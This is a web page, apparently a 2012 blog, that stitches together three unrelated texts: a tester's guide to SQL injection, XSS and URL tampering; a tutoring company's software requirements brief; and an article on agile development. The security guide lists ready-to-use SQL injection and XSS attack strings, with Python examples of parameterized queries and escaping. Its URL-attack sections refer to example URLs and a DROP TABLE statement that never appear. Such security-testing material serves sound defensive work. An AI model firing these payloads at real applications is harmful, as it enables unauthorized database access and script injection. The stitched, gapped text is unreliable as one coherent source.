Friday, December 21, 2012

Injection Attacks

Investigation Document: Injection Attacks
1 Introduction

1.1 What is an Injection Attack?

An injection attack is a type of security exploit in which the attacker supplies code through a web form input box to gain access to resources or to change data. The submitted input is treated as a request for some action to be performed by the database or by the application code. Typically, on a web form for user authentication, the name and password a user enters into the text boxes are inserted into a query. If the values are found as expected, the user is allowed access; if they are not found, access is denied.

1.2 Types of Injection Attacks

Weak input validation is a common vulnerability that can allow your application to be exploited by a number of injection attacks. The following are common types of attack that exploit weak or missing input validation:
·         SQL Injection Attacks
·         Cross Site Scripting (XSS)
·         URL Rewriting/Tampering


2 SQL Injection Attacks

2.1 Introduction

“This is the process of inserting SQL statements through the web application user interface into some query that is then executed by the server.”
SQL injection attacks are very critical because the attacker can obtain vital information from the server's database. To find SQL injection entry points in your web application, look through the code base for places where SQL queries built from user input are executed directly against the database.
If user input is placed directly into SQL queries, an attacker can supply SQL statements, or fragments of them, as input to extract vital information from the database. Even if the attacker only succeeds in crashing the application, the SQL error shown in the browser can give them the information they are looking for. Special characters in user input must be handled or escaped properly in such cases.
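
An added example (not code from the original document) of the login query described above, built once by string concatenation and once with bind parameters, using a constructed in-memory SQLite table; it also shows the error-message leak, since a malformed input such as 1'1 makes the concatenated query raise a syntax error whose text a handler must not echo to the browser:

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data (not from the original document): two accounts.
    Passwords are stored in clear only to keep the sample short."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Builds the query by concatenation, so quotes in the input become SQL syntax.

    With username and password both set to  1' OR '1'='1  the query becomes
    ... WHERE username = '1' OR '1'='1' AND password = '1' OR '1'='1'
    and the trailing OR '1'='1' is always true: every row comes back.
    """
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return sorted(row[0] for row in conn.execute(sql))


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Uses bind parameters: the driver passes the input as data, never as SQL text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def vulnerable_error_message(conn, username, password):
    """Returns the database error text the concatenated query produces, or None.

    An input such as  1'1  breaks the quoting and makes SQLite raise a syntax
    error; rendered to the browser, that text tells the attacker how the query
    is assembled (the error leak described in section 2.1).
    """
    try:
        login_vulnerable(conn, username, password)
    except sqlite3.Error as exc:
        return str(exc)
    return None


def safe_login(conn, username, password) -> dict:
    """Server-side handler: parameterized query, generic message on any DB error."""
    try:
        rows = login_parameterized(conn, username, password)
    except sqlite3.Error:
        # Log the real exception server-side; never echo it to the client.
        return {"ok": False, "user": None, "error": "login failed"}
    return {"ok": bool(rows), "user": rows[0] if rows else None}


if __name__ == "__main__":
    db = build_db()
    payload = "1' OR '1'='1"
    print("vulnerable   :", login_vulnerable(db, payload, payload))
    print("parameterized:", login_parameterized(db, payload, payload))
    print("error leak   :", vulnerable_error_message(db, "1'1", "x"))
```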

2.2  Examples of SQL Injection Attacks

The following are some examples of SQL injection attack strings:

Attack String
1 OR 1=1
1' OR '1'='1
1'1
1 EXEC XP_
1 AND 1=1
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
1 AND USER_NAME() = 'dbo'
'; DESC users; --
1'1
1' AND non_existant_table = '1
' OR username IS NOT NULL OR username = '
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
1 UNI/**/ON SELECT ALL FROM WHERE
%31%27%20%4F%52%20%27%31%27%3D%27%31
1' OR '1'='1
&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49

3 Cross Site Scripting (XSS) Attacks

3.1 Introduction

When a user inserts HTML or client-side script into the user interface of a web application and that input is displayed to other users, it is called XSS.
The tester should additionally check the web application for XSS (cross-site scripting). Any HTML, e.g. <HTML>, or any script, e.g. <SCRIPT>, should not be accepted by the application. If it is, the application may be vulnerable to cross-site scripting.
An attacker can use this method to execute a malicious script or URL in the victim's browser. Using cross-site scripting, an attacker can use scripts such as JavaScript to steal user cookies and the information stored in them.
Many web applications collect some user information and pass it in variables between pages.
E.g.: http://www.examplesite.com/index.php?userid=123&query=xyz
An attacker can easily pass malicious input such as <script> in the ‘&query’ parameter, which can expose important user or server data in the browser.
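
An added example (not code from the original document) for the reflected ‘query’ parameter above. It contrasts a literal reading of the "reject <HTML> or <SCRIPT>" check with output encoding: the blocklist regex is an assumption made here for illustration, the sample strings are taken from the list in section 3.2, and html.escape is what neutralises all of them:

```python
import html
import re
from urllib.parse import parse_qs, urlsplit


def query_param(url: str) -> str:
    """Returns the 'query' parameter of a URL such as
    http://www.examplesite.com/index.php?userid=123&query=xyz (empty if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("query", [""])[0]


# Assumed literal reading of the section's advice: reject input containing an
# <HTML> or <SCRIPT> tag. Shown only to demonstrate why a blocklist is not enough.
TAG_BLOCKLIST = re.compile(r"<\s*/?\s*(html|script)\b", re.IGNORECASE)


def rejected_by_blocklist(value: str) -> bool:
    return TAG_BLOCKLIST.search(value) is not None


def render_vulnerable(value: str) -> str:
    """Reflects the parameter straight into the page: any markup in it is parsed."""
    return "<p>Results for: " + value + "</p>"


def render_escaped(value: str) -> str:
    """Output encoding: <, >, &, " and ' become entities, so the browser shows the
    text instead of treating it as a tag, an attribute or a script."""
    return "<p>Results for: " + html.escape(value, quote=True) + "</p>"


# Attack strings from section 3.2 of the document.
SAMPLE_STRINGS = [
    "<SCRIPT>document.vulnerable=true;</SCRIPT>",
    '<IMG SRC="jav ascript:document.vulnerable=true;">',
    r'<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>',
    '<iframe src="javascript:document.vulnerable=true; <',
    "<<SCRIPT>document.vulnerable=true;//<</SCRIPT>",
]


def missed_by_blocklist(samples=SAMPLE_STRINGS) -> list:
    """Strings the blocklist lets through although they are live markup when reflected."""
    return [s for s in samples if not rejected_by_blocklist(s)]


def escaped_output_is_inert(samples=SAMPLE_STRINGS) -> bool:
    """True when no escaped sample still contains a raw '<' or '"' that could open a tag."""
    return all(
        "<" not in html.escape(s, quote=True) and '"' not in html.escape(s, quote=True)
        for s in samples
    )


if __name__ == "__main__":
    for s in SAMPLE_STRINGS:
        print(rejected_by_blocklist(s), render_escaped(s))
```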

3.2 Examples of XSS Attacks

The following are some examples of XSS attack strings:

Attack String
 <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
 <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
 <SCRIPT>document.vulnerable=true;</SCRIPT>
 <IMG SRC="jav ascript:document.vulnerable=true;">
 <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
 <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
 <iframe src="javascript:document.vulnerable=true; <
 </TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>
 <BODY BACKGROUND="javascript:document.vulnerable=true;">
 <BGSOUND SRC="javascript:document.vulnerable=true;">
 ¼script¾document.vulnerable=true;¼/script¾
 <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET>
 <style><!--</style><script>document.vulnerable=true;//--></script>
 <![CDATA[<!--]]<script>document.vulnerable=true;//--></script>
 <xml src="javascript:document.vulnerable=true;">
 [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
 <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->

4 URL Manipulation/Tampering Attacks

4.1 Introduction

URL manipulation, also called URL rewriting, is the process of altering the parameters in a URL (Uniform Resource Locator). Changing some information in the URL may sometimes lead to unintended behaviour by the server.
The tester should check whether the application passes important information in the query string. This happens when the application uses the HTTP GET method to pass information between the client and the server; the information is carried in parameters in the query string. The tester can modify a parameter value in the query string to check whether the server accepts it.
In an HTTP GET request, user information is passed to the server for authentication or for fetching data. An attacker can manipulate every input variable passed in this GET request to the server in order to obtain the information they want or to corrupt the data. In such conditions any unusual behaviour by the application or web server is a doorway for the attacker into the application.

4.2 URL Manipulation

By manipulating certain parts of a URL, a hacker can get a web server to deliver web pages he is not supposed to have access to.
On dynamic websites, parameters are mostly passed via the URL as follows:
http://target/forum/?cat=2
The data in the URL is created automatically by the site, and when navigating normally a user simply clicks on the links the website offers. If a user manually modifies the parameter, he can try different values, for example:
http://target/forum/?cat=6
The hacker may potentially obtain access to an area that is usually protected.
In addition, the hacker can get the site to process an unexpected case, for example:
http://target/forum/?cat=***********
In the above example, if the site's designer has not anticipated the case where the data is not a number, the site may enter an unexpected state and reveal information in an error message.
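
An added example (not code from the original document) of how a handler for http://target/forum/?cat=N should treat the three cases above: a strict syntax check so that cat=*********** is answered with a generic 400 rather than an error message, and a separate authorization check so that a well-formed cat=6 or cat=3 still cannot reach a protected area. The category table and roles are constructed for the example:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample data (not from the original document).
CATEGORIES = {1: "General", 2: "Maths", 3: "Staff only"}
# Which categories each hypothetical role may view; cat=3 is the protected area.
ROLE_CATEGORIES = {"guest": {1, 2}, "staff": {1, 2, 3}}

CAT_PATTERN = re.compile(r"[0-9]{1,9}")  # ASCII digits only, bounded length


class RequestError(Exception):
    """An HTTP status plus a generic message; never the underlying exception text."""

    def __init__(self, status: int, message: str):
        super().__init__(message)
        self.status = status
        self.message = message


def parse_cat(url: str) -> int:
    """Validates the cat parameter before anything else touches it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = params.get("cat", [])
    if len(values) != 1:
        raise RequestError(400, "cat must be supplied exactly once")
    raw = values[0]
    # Rejects ***********, negative numbers, 'cat=2 OR 1=1' and oversized values
    # instead of letting them reach the database or surface as a stack trace.
    if not CAT_PATTERN.fullmatch(raw):
        raise RequestError(400, "invalid category")
    return int(raw)


def forum_page(url: str, role: str) -> dict:
    """Simulated handler for http://target/forum/?cat=N for the given session role."""
    try:
        cat = parse_cat(url)
        if cat not in CATEGORIES:
            raise RequestError(404, "no such category")
        # Syntax is not enough: a well-formed value must still be checked against
        # what this role is allowed to see, or changing 2 to 6 opens protected areas.
        if cat not in ROLE_CATEGORIES.get(role, set()):
            raise RequestError(403, "not allowed")
        return {"status": 200, "title": CATEGORIES[cat]}
    except RequestError as err:
        return {"status": err.status, "error": err.message}


if __name__ == "__main__":
    for u in ("http://target/forum/?cat=2", "http://target/forum/?cat=6",
              "http://target/forum/?cat=***********"):
        print(u, forum_page(u, "guest"))
```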

4.3 SQL Injection Attacks in URL

An attacker may abuse the fact that the UserID parameter is passed to the database without sufficient validation. The attacker can manipulate the parameter's value to build malicious SQL statements. For example, setting the value "123 OR 1=1" for the ProductID variable results in the following URL:
In this example the semicolon is used to pass the database server multiple statements in a single execution. The second statement is "DROP TABLE ECF.PERMISSION", which may cause SQL Server to delete the entire table.





4.4 XSS Attacks in URL

Adding some text inside an <HTML> tag in the URL crashes the application. Below is the example:

5 Tools

5.1 Introduction

Exploit-Me is a suite of Firefox add-ons for web application security testing, designed to be lightweight and easy to use. It includes:
·         SQL Inject-Me
·         XSS-Me
Exploit-Me can be downloaded from the following URL: http://labs.securitycompass.com/index.php/exploit-me/
§  SQL Inject-Me: SQL injection vulnerabilities can cause a lot of damage to a web application. A malicious user can possibly view records, delete records, drop tables or gain access to your server. SQL Inject-Me is the Exploit-Me tool used to test for SQL injection vulnerabilities. SQL Inject-Me can easily be downloaded as an add-on for Mozilla Firefox. After installation it can be seen in the Tools menu as shown below:
When we click on Open SQL Inject Me Sidebar, it opens the SQL injection tool list in the left sidebar, as shown below:
§  XSS-Me: Cross-site scripting (XSS) is a common flaw found in web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process helps protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.
XSS-Me can easily be downloaded as an add-on for Mozilla Firefox. After installation it can be seen in the Tools menu as shown below:


When we click on Open XSS Me Sidebar, it opens the XSS tool list in the left sidebar, as shown below:


5.2 Functioning of the tool

Step 1: Open the application in Mozilla Firefox. Now from the Tools menu open the SQL Inject-Me tool, as shown below:


In the sidebar, each tab represents a form on the page and lists all its fields. For example, it is displaying Username, Password and the Login button:




Step 2: If we want to insert a SQL injection query into any text box field (Username or Password), we can select the option from the left navigation.
1.       For example, to insert a SQL injection query into the Username text field, select the checkbox and choose a SQL query from the ‘txtLogin’ drop-down. It will display the selected SQL query in the “Username” text box of the application, as shown below; here we are selecting the query “1' OR '1'='1”.
Now click the Login button on the application and check the result. In the same way we can select different SQL queries from the drop-down and check the results.
2.       For example, if we select the query “&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49” from the drop-down and click Login.
Result: the following error will appear:

Step 3: If you want to execute different queries simultaneously and have the tool check the results, select the checkboxes in the left navigation and click the “Execute” button. It will display the results. The user can also select the “Test all forms with all attacks” option; it will execute all selected queries on all forms of the application.

It will display results as follows. Errors are displayed in “Red” and queries which execute successfully are displayed in “Green”.

5.3 How to customise queries in the tool library


Step 1: Go to the “Tools” menu, select SQL Inject Me, and then go to Options.

Step 2: It will open a pop-up window from where the user can “Add” or “Remove” SQL queries.

BASIC OVERVIEW OF REQUIREMENTS AND CURRENT SYSTEMS


THESE SYSTEMS WHOLLY COMPRISE MY BUSINESS OPERATION CURRENTLY

 
I would like the software to manage all my data and perform every operation that currently exists in my business processes.
Mostly I want everything to work as it does now but
·        To be integrated into one whole software solution which is online
·        enable tutors/clients to enter and view data online at will instead of having to make phone enquiries to view/change their data...i.e. clients can log in, view their tutor’s contact details, view past progress reports and account statements; view details of their last payment etc.... tutors can log in, complete reports, create invoices for their hours...
·        enable a better automation of tasks, especially if-then processes which are dependent on an amount of time passing e.g. if client has had > 10 hrs of tutoring then send a “follow up” email.....
·        enable access to the system from any internet enabled computer and have different access rights for various staff

The main systems:
1.     SALES SYSTEM
CURRENTLY: this system exists as a separate MS Excel file. VBA forms and macros manage this volume of data and keep track of prospective clients as they move through the sales process.
·        Stores prospective client enquiries and manages sales data; clients enquire by email, phone, online form
·        Needs to operate almost exactly as it currently does... including looking up client locations via the MapQuest API currently being used to see if there are tutors in the vicinity for a given subject and grade level
·        This system is very simple; it queries data and has numerous auto- templates for SMS and email messages
·        It also has basic stats for how many enquiries are converted to sales etc ...very simple calculations
·        Probably the trickiest part of this program is tracking the conversion from enquiry to
“new client” and attributing the sale to a corresponding sales person AND removing the attributed sale if the client cancels before their first lesson

2.     Recruitment Management System
General Recruitment Concepts


·         Because tutors are mostly uni students and their timetable are subject to change regularly etc many tutors don’t stay for very long due to lack of availability. This means recruitment needs to be constant and in high volume. For this to be feasible it needs to be very efficient.


The Recruitment Process
1.      Applicants submit their resume through an online form

2.      Successful applicants submit a thorough profile application through an online form


3.      Successful applicants are invited to book an interview using online booking software

4.      Applicants attend an online interview using software not dissimilar to Skype


5.      Successful applicants are called and offered a position, sent a contract

6.      Once the contract is received they are sent the training manual and training manual test


7.      Once they send back the test they are Entered into our system and sent an email with welcome documents
·         Now they can be considered for new students in their areas and are entered into the regular BMS

The Recruitment Management System
·         This is a web based software package built by an outsourcer to my exact specifications. It allows for the recruitment process above to be done super efficiently.

·         Resume and profile applications go directly into this software package

·         It basically takes only the click of one button to move an applicant from one step in the above process to the next


·        This works perfectly in its current form; perhaps a couple new queries would be useful to meet new needs
·        Really it just needs to be integrated with the rest of the system so that
    i.      New tutors can be entered into the regular BMS system with a click directly from RMS
    ii.     Tutor resumes and profile applications can be accessed from the individual tutor record within the regular database (BMS).
o   This system completely manages the whole recruitment process. Captures resumes, organises interviews, sends contracts etc

3.     CEP Program – Training Module Software
Basic concept/Purpose
·         There needs to be a simple way to remain in communication with tutors otherwise there is no relationship between EMT and the tutors besides monthly invoices

·         It would be great to give ongoing bits of training to tutors to keep them somewhat engaged and improve their skill

·         Some tutors take their jobs seriously whereas others are very casual about it. Most tutors are Gen-Y

·         With an ever growing number of tutors (currently around 220 actively working) if there is going to be regular communication, it needs to be automated as much as possible.

·         There also needs to be a way to efficiently collect standardised invoices from tutors

Overview
·         The CEP works only with tutors that currently have active students

·         It sends a “learning module” or article to tutors on a fortnightly basis

·         Each article comes with an online form that the tutors must complete – the form asks

·         If tutors are too busy they can elect online “Can’t complete CEP this fortnight”

·         There is a part of this program that collects invoices from tutors through an online form.


o   The online form collects Monthly Progress reports and Invoices from tutors
o   The software form then renames the files to a standardised name series which is compatible with the BMS for end of month processing
o   NB: with the new software there will be a separate process to submit tutor invoices – I am just trying to show how the business works.

Functionality
·         This system is 100% completely automated

·         CEP and invoices are submitted via online forms

·         The only human involvement is to overview the submitted CEP forms i.e. reply to any tutors who wanted some help or advice.


·         The system automatically sends SMS and email reminders to tutors when they need to submit any documents
o   It also sends auto reminders when tutors are late with their correspondence

·         If a tutor has not submitted their CEP form for 3 fortnights in a row, they will not be able to submit an invoice

·         This system is an online system written by an outsourced programmer according to my own specifications. It is completely separate to the BMS.

·         We also need to manage tutor’s status i.e.
o   When they have active students, the CEP should run and they should submit invoices and be sent reminders
o   When they don’t have active students they don’t need to complete the CEP forms or submit invoices

·         In order to manage the tutor’s status a CEP-Excel software module was created. It allows for communication between the BMS VBA program and the CEP program. This allows for a situation where human involvement is not necessary for managing the CEP or Invoice Submission process.

·        This works perfectly as it currently is – it would only need to be integrated
·        The current integration has a few tricky IF-THEN rules which determine when to set a tutor to active in the CEP system, when to immediately deactivate them and when to set them as “deactivating” for another month....all these rules are based on testing whether or not a tutor has “active” students and if not then when their last month of work would be/would have been
    i.      In a nutshell, this system automates the distribution of training modules to tutors and reminds them to submit invoices.


4.     BUSINESS MANAGEMENT SYSTEM
This is the Excel spreadsheet that holds all our data currently. A VBA form with various functions helps to manage this. It is what I have instead of a database at the moment. There are 2 main data workbooks; one for storing tutor details and one for storing client details. There is also a new workbook for each month to store client details that may change on a monthly basis such as their tutor, payments received; hourly rate etc... I don’t imagine it would be too difficult to model a real database on this data.
The business management system is itself comprised of numerous main functions/processes/interfaces

a)     ACCOUNT START
a.     Monitor a client’s account after they are entered as a new client for example: see which new clients need to be assigned a tutor; assign an original tutor to them; if a tutor hasn’t confirmed contact with the client send them and email/sms; if the client has had >10hrs tuition send an automated follow up email; after 20hrs tuition send an email requesting testimonials etc; also has incorporated the mapping software to see which tutors are suitable/close
·  This is mostly just a set of queries and set of automated email/sms responses

b)    TUTOR SWAP
a.     Similar to Account Start; see which clients need to be assigned a replacement tutor; this is the process by which a replacement tutor is allocated to a client; again if the tutor hasn’t confirmed contact with client after 2 days of being assigned they are sent an email; after 10hr the client is sent a follow up email etc; also has incorporated the mapping software to see which tutors are suitable/close
·  This is mostly just a set of queries and set of automated email/sms responses

c)     ACCOUNT MANAGEMENT
a.     This is the system by which I manage who owes us how much money; who has not paid any money to their account for 1 month-2months-3months etc; plus a few other query types are available
·  This is mostly just a set of queries and set of automated email/sms responses

d)    STATISTICS
a.     This is a page which calculates various metrics such as average hours per student; average rate per hour etc etc . . . really this is just aggregating information and manipulating it. There are a few tricky formulas here but nothing genuinely complex.

e)     EMAIL PROGRAM
a.     This program allows me to send a template email only to those clients or tutors which meet certain conditions. For example an email to clients who are “active”; an email to senior tutors who have had more than 100hours of experience etc

f)      INVOICING AND BILLING
·        This is by far the most complicated system I have created for the business and is probably the most convoluted in terms of processes, conditions, rules etc BUT it is probably less complicated than the CEP Training Module Software.

1.     A tutor’s hours are entered for each student; the software stores those hours in the tutor records and creates a pdf statement which is emailed to clients. Complications arise because there may/may not have been other tutors who worked with this student during the month and we need their invoices for this client account too; also the software tests if the tutor submitted a progress report which is mandatory under certain conditions and if they did not then they are sent a reminder and the account statement is not yet sent etc...
·        With the new software this will all need to happen online such that tutors can themselves enter their hours for each student each month etc...

Expected Challenges; Unanswered Questions and Concerns:
1.     Data entry from forms. Currently I have custom built forms such as the contact form which clients use to enquire from our website – I would like this data to be auto captured into the “Sales Management” part of the system. I am also concerned about this because in the near future I will have a design company build me a new site and I am not sure how to make it so that the new forms will be compatible with this system that we are going to build?

2.     Payments. I need some sort of integrated ecommerce component. Clients need to be able to log in to their account – see what they owe and make a payment. The payment should automatically be added to their account. I am not sure what solutions exist for this? There is Eway and SecurePay which I have been considering – they have APIs.
    i.      Also, the way I pay my tutors is direct into their bank account using their bank account details – there is a way to semi-automate this by creating ABA files so I don’t have to do it manually for each tutor as I do now. It definitely is possible, have a look at http://www.bluechilli.com/software/apps/cemtex-aba-file/aba-file-format.html . ABA files are simple text documents with very specific formatting.

3.     Implementation. How will we convert from me using the old system to using the new system? My business is at a size where I have new clients, new tutors, payments etc on a daily basis. ALSO, how will we enter the existing data into the new system? There is a lot of it – too much to do by hand, and I need that data to be readily available.

4.     Security/Password protection etc
    i.      Currently I use a program called Website Access Manager to manage which users have access to log in to the tutor admin section etc... this will not suffice for our project. Each tutor and each client needs to have access not only to generic forms as now but also to their specific information. As such I believe that a new system/process will need to be created for assigning access privileges to users – also this needs to be automated somewhat and integrated, for example; when a tutor is “hired” a password and username is automatically created for them and they are assigned standard access rights to their data as well as generic resources which are available to all tutors such as practice maths worksheets

    ii.     Also, there needs to be a way to manage access rights to this software itself for my employees. i.e. the sales staff should only have access to the sales program; only I should have access to the statistics etc
    iii.    How will we convert the existing users and passwords to the new system?

5.     General risks:
    i.      Once the software is up and running my WHOLE business will depend on it. Should you fall ill or your company fall apart, there will be no way for errors to be corrected or for new functionality to be installed. This is a major concern for me. I think we can possibly handle this by creating extremely thorough documentation so that in such an event another coder or company of coders could pick up the pieces?

    ii.     Surely with such a large project there will be many tweaks and “extras” required over the next few months after installation. I don’t think these “extras” are predictable and I would like to organise some sort of retainer payment system whereby on top of the quoted price for the project, I will pay you some sort of maintenance fee? The business is growing and I have high ambitions – changes are likely to be regular.


Agile Software Development


Introduction
This article presents Agile software development, an alternative approach to software project management that is quite different from the traditional models. It promises to bring agility to software development processes and promotes an evolutionary change in how software projects are managed. The article aims to give its readers a broad overview of this methodology.
What is Agile Software Development?
Agile is basically an alternative approach to software project management that is quite different from the traditional waterfall model mostly practiced by software firms globally. We now come across various popular methods such as Crystal, Extreme Programming (XP), Scrum, Adaptive Software Development, etc. All of these together form agile software development. Agility is important not only for software development methodologies, but for any organization. Agility is the keyword for the survival of organizations in the near future.
Agile methods are based on real time communication between the programming team and its customers. The customers normally include project managers, analysts, and actual customers. All of them communicate face-to-face without putting much emphasis on written documentations. This is a key emphasis area for Agile Development and is a point of criticism. The team resides in an arrangement or enclosure wherein they can freely communicate with each other. The enclosure also may contain Quality Assurance Engineers, Graphics Designers and respective managers.
Most of the agile software development methods call for minimizing the risk by developing software in short modular boxes called iterations. Each of these iterations is by itself a mini software project and follows all the standard phases of the software project life cycle, such as project planning, requirement analysis, system design, code generation, testing and documentation. Completion of any iteration is followed by review of the project priorities by the project team.
Looking back in time
Agile development arose as a reaction against the commonly practiced software development models of earlier days, namely the waterfall model. It started becoming a popular and practical development approach in the mid 1990s. Agile development came into existence because the theoretical approach of the waterfall model turned out to be quite different from the practical methods developers actually followed to successfully design and develop software. In the early days, agile development methods were referred to as “lightweight” methods. In 2001 the agile community adopted the name “agile methods.” Several agile development methods have been available to the software industry, each with its own significance to its followers, and the community is consistently working towards effective use of these methods by the software development world.
The Agile Development Standards
Agile development is based on some standards outlined in this section.
Continuous involvement of customer - The need for involvement of an end user throughout the project lifecycle in agile development is very important. An end user has to be made available throughout the project development lifecycle and interact with the developers and help them achieve their project goals. They also need to verbally communicate on a regular basis to make the project lively and free of any bugs arising from misconceptions.
Team members should take important decisions - The project development team should have enough authority to take important decisions in collaboration with the end user (customer). The team members need not always wait for higher authorities to take the decisions needed to move the project ahead; escalation can be used when absolutely needed and avoided in general. The team members can take proper decisions together with the customer contacts they collaborate with. They should, however, know how to manage the customer’s expectations optimally.
Requirement analysis, a continuous process - In traditional models, the requirements are normally analyzed and fixed at the very initial level of the project lifecycle. Whatever the case may be, the emphasis is given to capture as much requirements as possible and to streamline the project scope. Any future changes are normally taken care of as a separate activity under “change request management.” Agile development works on a philosophy that is very much different from traditional software development methodologies.
Agile development methodology can address requirements that evolve over time. How? The time period for any project is kept fixed and requirements are allowed to come in during the project lifecycle. Therefore, the project team and the end user (the customer) need to include or remove requirements keeping the fixed time period in mind. As a result, they may need to trade this new work against some other comparable work within the project to accommodate the change.
Project requirements are visual and adequately drawn - Agile project requirements are drawn mostly at high level and are optimal and visual in nature. These requirements are mostly drawn bit by bit and help to develop the software for any specific feature or module. The visual representation of the requirements helps the agile developers to develop the solution closest to accuracy against its actual requirements. The requirements are sufficient in volume so as to provide that much input that is required for developing and testing the feature or module. This also enables reasonable efficiency. The objective behind this approach is to minimize the time taken for secondary activities in the project lifecycle that are always required to take ahead the project, but are certainly not a part of the end product or the solution.
Development produces small, incremental releases with iterations - In traditional software development methodologies the requirements for the whole software are collected at the very beginning, analyzed and then the software is developed with all its components and finally testing is done for the entire solution followed by its release. Agile software development approach supports a different cycle in terms of analysis, development and testing. The agile development projects are produced in separate pieces with small, “incremental releases.” Each of the features in the whole solution is separately treated and each of these features has its own three phases or steps (analysis, development, and testing). Once this feature is developed, the next feature is developed in succession following similar phases. Hence, the methodology enables doing each of these steps for each feature, with one feature at a time.
Recurrent product delivery – Agile development supports recurrent delivery of the software product. The product is broken up into several modular features, and each feature is delivered incrementally on a regular basis.
Fullest completion of each feature – Agile development ensures that each isolated feature is fully completed in terms of analysis, development, testing and release before the next feature or module is taken up. Care is taken to fully complete the functionality within each feature (a mini project in itself) before proceeding to the next feature, which is another mini project in succession.
The 80/20 Rule – Pareto's law, also known as the 80/20 rule, observes that many distributions follow a similar curve: roughly 20% of the effort put in produces 80% of the results. The percentages vary from situation to situation, but the point is that a small set of very important efforts can be identified and pursued to produce the bulk of the desired results. Agile development therefore emphasizes smart development, in which the team focuses on identifying the most important "20%" of the effort that brings out the greater part of the results.
Continuous testing – Agile development encourages regular testing throughout the project lifecycle rather than a separate testing phase at the end. The team unit tests each feature while developing it. This not only produces software of high quality but also supports the iterative, incremental releases. Automated, repeatable unit tests verify that every modular feature still works as expected each time a build is created. Builds are created regularly and integration is done continuously as development progresses. The primary objective of this approach is to keep the software in a releasable condition at all times throughout the development cycle.
Collaborative and cooperative development approach – Agile development is strongly based on effective collaboration and cooperation among all team members and the end users (clients). It favors lean but effective requirements and documentation, which demands close collaboration at all times. Requirements need to be clarified at the right time, and team members and end users should be kept equally up to date throughout development so that they understand the status of the work in progress and the goals to be attained.
The Agile Development Methods
Several agile methods are currently available, of which a few have gained greater importance in practice. We will elaborate on a few of the popular ones: Scrum, Extreme Programming (XP), Crystal Clear, and DSDM (Dynamic Systems Development Method). Other methods include the Agile Unified Process (AUP), Agile Modeling, Adaptive Software Development, FDD (Feature Driven Development), and Lean Software Development.
Let us take a look into a few commonly practiced agile methods in the following sections.
Scrum
Scrum traces its origin to a 1986 paper on product development and was adapted to software development in the early 1990s with the objective of providing a highly iterative development methodology. The people best known for establishing it are Jeff Sutherland, Ken Schwaber, and Mike Beedle.
Scrum focuses primarily on the management side of software development, dividing the whole development period into short, fixed-length iterations (originally thirty days, now commonly one to four weeks) called "sprints." This makes the process easier to administer and allows development to be controlled through daily team meetings. Engineering practices are of lesser importance in Scrum; users can, however, combine the engineering practices of other popular agile methods with the project management aspects of Scrum.
A Scrum Master acts as a facilitator and removes the obstacles the team faces while pursuing its sprint goals. The Scrum team is generally co-located, well organized, and communicates extensively about the development work, which helps it make effective progress and attain the sprint goals. Scrum takes credit for addressing fundamentally empirical challenges: it accepts that a software problem is never fully defined at its inception, and it concentrates the team's effort on rapid delivery and fast response to emerging requirements.
Extreme Programming (XP)
Extreme Programming is said to be the most popular and important of the agile development methodologies available to date. It owes its origins to the Smalltalk community of the late 1980s, and in particular to Kent Beck and Ward Cunningham, who went on to develop the XP practices into a software development methodology that is people-centric and highly adaptive. Kent Beck authored the popular book on the methodology, "Extreme Programming Explained," which came out in October 1999 and still serves as a good reference for practitioners.
Extreme Programming prescribes a set of daily practices for its team members. These can be seen as traditional software development practices taken to their highest level of productivity. They help the team respond to customers more fully and faster than traditional methods do, and they help produce software of better quality. In line with the other agile methods, XP accepts that requirements can arrive at any time during the project lifecycle (rather than being defined at the very beginning) and expects the team to adapt to those emerging requirements with an energetic response.
Crystal Clear
Alistair Cockburn, one of the great exponents of the agile community, developed the Crystal family of software development approaches, which are tailored to teams of different sizes. All of the Crystal methods share similar features and properties, the most important being Frequent Delivery, Reflective Improvement, and Close Communication. Crystal requires less discipline than XP and has a reduced chance of failure.
Crystal Clear is an important variant of the Crystal methodologies, suited to a co-located team of about 6 to 8 developers working on lightweight systems. Its emphasis is on people rather than processes. The important properties of Crystal Clear are as follows.
·         Usable code is delivered to the users regularly
·         The team reflects on its work and improves its process
·         Regular, effective verbal communication between co-located team members
·         Easy access to expert users
Dynamic Systems Development Method (DSDM)
DSDM is a framework based on RAD (Rapid Application Development) that follows a user-driven, incremental and iterative approach to designing and developing software on time, within a strict budget, and satisfying all its business needs. It originated in the United Kingdom in the 1990s, created by the DSDM Consortium (a non-profit organization). As an extension of RAD, DSDM emphasizes information systems projects with steep deadlines and strict budgets. Where appropriate, DSDM can be integrated with other agile methods.
So, should we go agile?
